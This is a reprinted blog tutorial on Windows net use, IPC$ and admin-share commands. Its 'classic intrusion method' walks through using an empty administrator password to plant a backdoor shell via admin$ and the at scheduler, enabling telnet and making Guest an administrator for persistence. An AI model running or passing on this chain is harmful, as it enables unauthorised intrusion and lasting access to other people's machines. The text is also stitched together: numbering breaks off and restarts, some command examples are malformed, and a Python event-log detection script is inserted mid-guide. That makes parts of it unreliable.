Net use command details
Disclaimer: This article is reprinted content. Thanks to the hard work of the original author. Original link: http://www.cnblogs.com/chinahbzm/articles/1423875.html
1) Create an empty connection (a null session):
net use \\IP\ipc$ "" /user:"" (Note: this command contains three spaces)
2) Establish a non-empty connection:
net use \\IP\ipc$ "password" /user:"username" (also three spaces)
3) Map a default share:
net use z: \\IP\c$ "password" /user:"username" (maps the other party's drive C to your own drive Z; other drives work the same way)
If an ipc$ connection to the target has already been set up, you can access the share directly with IP + drive letter + $. The command is: net use z: \\IP\c$
4) Delete an ipc$ connection:
net use \\IP\ipc$ /del
5) Delete share mappings:
net use c: /del (deletes the mapped drive C; other drives work the same way)
net use * /del (deletes all mappings; confirm with y when prompted)
3. View the shared resources of a remote host (default shares are not shown):
net view \\IP
4. View the shared resources of the local host (local default shares are shown):
net share
5. Obtain the user name list of a remote host:
nbtstat -A IP
6. Obtain the user list of the local host:
net user
7. View the current time of a remote host:
net time \\IP
8. Display the services currently running on the local host:
net start
9. Start/stop local services:
net start <service name> /y
net stop <service name> /y
10. Map a remote share:
net use z: \\IP\baby
This command maps the shared resource named baby to drive Z.
11. Delete a share mapping:
net use c: /del (deletes the mapped drive C; other drives work the same way)
net use * /del /y (deletes all mappings)
12. Copy files to a remote host:
copy \path\srv.exe \\IP\<shared directory name>, for example:
copy ccbirds.exe \\*.*\c$ (copies the file from the current directory to the target's drive C)
13. Add a scheduled task remotely:
at \\IP <time> <program name>, for example:
at \\127.0.0.0 :00 love.exe
Note: the time must be in 24-hour format. If the program is in the system's default search path (such as system32), no path is needed; otherwise the full path must be given.
14. Enable telnet on a remote host
This requires a small program, opentelnet.exe, which is available on all major download sites. Four conditions must be met:
1) ipc$ sharing is enabled on the target.
2) You have an administrator account and its password.
3) The RemoteRegistry service is enabled on the target, and NTLM authentication is required.
4) Valid for WIN2K/XP; not tested on NT.
Command format: OpenTelnet.exe \\server account psw NTLM-authentication port
Example: c:\> OpenTelnet.exe \\*.* administrator "" 1 90
15. Activate a user / add a user to the Administrators group
1) net user account /active:yes
2) net localgroup administrators account /add
16. Disable telnet on a remote host
This also requires a small program: ResumeTelnet.exe
Command format: ResumeTelnet.exe \\server account psw
Example: c:\> ResumeTelnet.exe \\*.* administrator ""
17. Delete an established ipc$ connection:
net use \\IP\ipc$ /del
9. Classic intrusion method
This intrusion method is a real classic; most ipc tutorials have introduced it, and I quote it here. Thanks to the original author! (I don't know which predecessor it was.)
1. C:\> net use \\127.0.0.1\IPC$ "" /user:"administrators"
This is a host whose administrator password is empty ("An empty password? Wow, what luck!"). Use this command to establish a connection to 127.0.0.1: because the password is empty, nothing goes inside the first pair of quotation marks, and the user name goes inside the second pair. Enter administrators and the command completes.
Before copying anything, use net view \\IP to view the other party's shares.
2. C:\> copy srv.exe \\127.0.0.1\admin$
First copy srv.exe, which is found in the Tools directory of "Streaming Light" (admin$ here refers to the other party's c:\winnt\system32\; you can also use c$ or d$, i.e. drive C or drive D, depending on where you want to copy to).
3. C:\> net time \\127.0.0.1
Check the time: the current time of 127.0.0.1 is displayed, followed by "The command completed successfully."
4. C:\> at \\127.0.0.1 11:05 srv.exe
Use the at command to start srv.exe (the time set here must be later than the host's current time, or how else would it start!)
5. C:\> net time \\127.0.0.1
Check the time again. Once the current time of 127.0.0.1 has reached the scheduled time, prepare to run the following command.
6. C:\> telnet 127.0.0.1 99
The telnet command is used here. Note the port: 99. Telnet uses port 23 by default, but here SRV has opened a shell on port 99 for us on the other computer.
Although we can telnet in, SRV is one-time only; it would have to be started again for the next login! So we plan to set up a Telnet service. This needs ntlm.
7. C:\> copy ntlm.exe \\127.0.0.1\admin$
Use the copy command to upload ntlm.exe (ntlm.exe is also in the Tools directory of "Streaming Light").
8. C:\WINNT\system32> ntlm
Enter ntlm to start it (here C:\WINNT\system32> is on the other party's computer; running ntlm actually runs the program on that computer). When "DONE" appears, it has started normally. Then use net start telnet to start the Telnet service!
9. telnet 127.0.0.1, enter the user name and password to log on to the other party; the operation is as simple as on DOS! (Then what do you want to do? Whatever you want, haha)
As a precaution, we activate guest and add it to the Administrators group.
10. C:\> net user guest /active:yes
Activate the other party's Guest user.
11. C:\> net user guest 1234
Change the Guest password to 1234, or set one of your choosing.
12. C:\> net localgroup administrators guest /add
Make Guest an administrator ^_^ (if the Administrator password is changed but the guest account is not, we can use guest to access this computer again next time)
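Every step of the chain above leaves a distinct entry in the Windows Security log, which is what a defender correlates on. The following is an added example, not code from the original article: a small Python correlation over constructed sample events (the event IDs are real Windows IDs; the `src` field on the 4698/4722/4732 events is assumed to have been joined from the logon session by the collector).

```python
"""Spot the IPC$ / admin-share chain in Windows Security events.
Added example, not code from the original article: events are simplified
dicts with the fields a collector extracts from the Security log."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample (IDs are real Windows event IDs): 10.0.0.5 walks the steps
# above; 10.0.0.9 makes an ordinary share access. 'src' is assumed pre-joined.
SAMPLE_EVENTS = [
    {"ts": "2024-03-01T11:00:05", "id": 4624, "src": "10.0.0.5", "user": "ANONYMOUS LOGON", "logon_type": 3},
    {"ts": "2024-03-01T11:00:06", "id": 5140, "src": "10.0.0.5", "user": "ANONYMOUS LOGON", "share": "\\\\*\\IPC$"},
    {"ts": "2024-03-01T11:01:10", "id": 4624, "src": "10.0.0.5", "user": "administrator", "logon_type": 3},
    {"ts": "2024-03-01T11:01:12", "id": 5140, "src": "10.0.0.5", "user": "administrator", "share": "\\\\*\\ADMIN$"},
    {"ts": "2024-03-01T11:02:30", "id": 4698, "src": "10.0.0.5", "user": "administrator", "task": "\\At1"},
    {"ts": "2024-03-01T11:08:00", "id": 4722, "src": "10.0.0.5", "user": "administrator", "target": "guest"},
    {"ts": "2024-03-01T11:08:20", "id": 4732, "src": "10.0.0.5", "user": "administrator", "group": "Administrators", "member": "guest"},
    {"ts": "2024-03-01T11:05:00", "id": 5140, "src": "10.0.0.9", "user": "alice", "share": "\\\\*\\Public"},
]

def stage_of(ev):
    """Map one event to a stage of the chain, or None if unrelated."""
    if ev["id"] == 4624 and ev.get("logon_type") == 3 and ev["user"].upper() == "ANONYMOUS LOGON":
        return "null_session"        # net use \\IP\ipc$ "" /user:""
    if ev["id"] == 5140 and ev.get("share", "").endswith("$"):
        return "admin_share"         # IPC$, ADMIN$, C$ and other hidden shares
    if ev["id"] == 4698:
        return "remote_task"         # at \\IP <time> <program>
    if ev["id"] == 4722:
        return "account_enabled"     # net user guest /active:yes
    if ev["id"] == 4732 and ev.get("group", "").lower() == "administrators":
        return "admin_group_add"     # net localgroup administrators guest /add
    return None

def detect_chain(events, window=timedelta(minutes=30)):
    """Return {src: sorted stages} for each source that touched an admin
    share and performed at least one follow-on step within `window`."""
    hits = defaultdict(list)
    for ev in events:
        if stage := stage_of(ev):
            hits[ev["src"]].append((datetime.fromisoformat(ev["ts"]), stage))
    findings = {}
    for src, seen in hits.items():
        first_share = min((t for t, s in seen if s == "admin_share"), default=None)
        if first_share is None:
            continue
        near = {s for t, s in seen if abs(t - first_share) <= window}
        if near & {"remote_task", "account_enabled", "admin_group_add"}:
            findings[src] = sorted(near)
    return findings
```

A lone admin-share connection is routine administration and is deliberately not flagged; only the share access plus a scheduled task, account activation or group change within the window produces a finding.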
In addition, you can analyze the cause from the returned error number:
Error 5, access denied: the user you are using probably does not have administrator privileges; raise privileges first.
Error 51, Windows cannot find the network path: a network fault.
Error 53, network path not found: wrong IP address; target not online; the target's lanmanserver service not started; or the target's firewall filtering the port.
Error 67, network name not found: your lanmanworkstation service is not started, or the target has deleted ipc$.
Error 1219, the credentials supplied conflict with an existing set of credentials: you already have an ipc$ connection to the other party; delete it and reconnect.
Error 1326, unknown user name or bad password: the cause is obvious.
Error 1792, an attempt was made to log on, but the network logon service was not started: the target's NetLogon service is not started.
Error 2242, the password of this user has expired: the target has an account policy that requires periodic password changes.
To remove network mappings in this way, open the system's Run dialog and execute cmd to switch to the MS-DOS command line. Then, at the DOS prompt, run net use x: /del to disconnect the mapping to network drive X. To quickly disconnect all network mappings on the local computer, run net use * /del.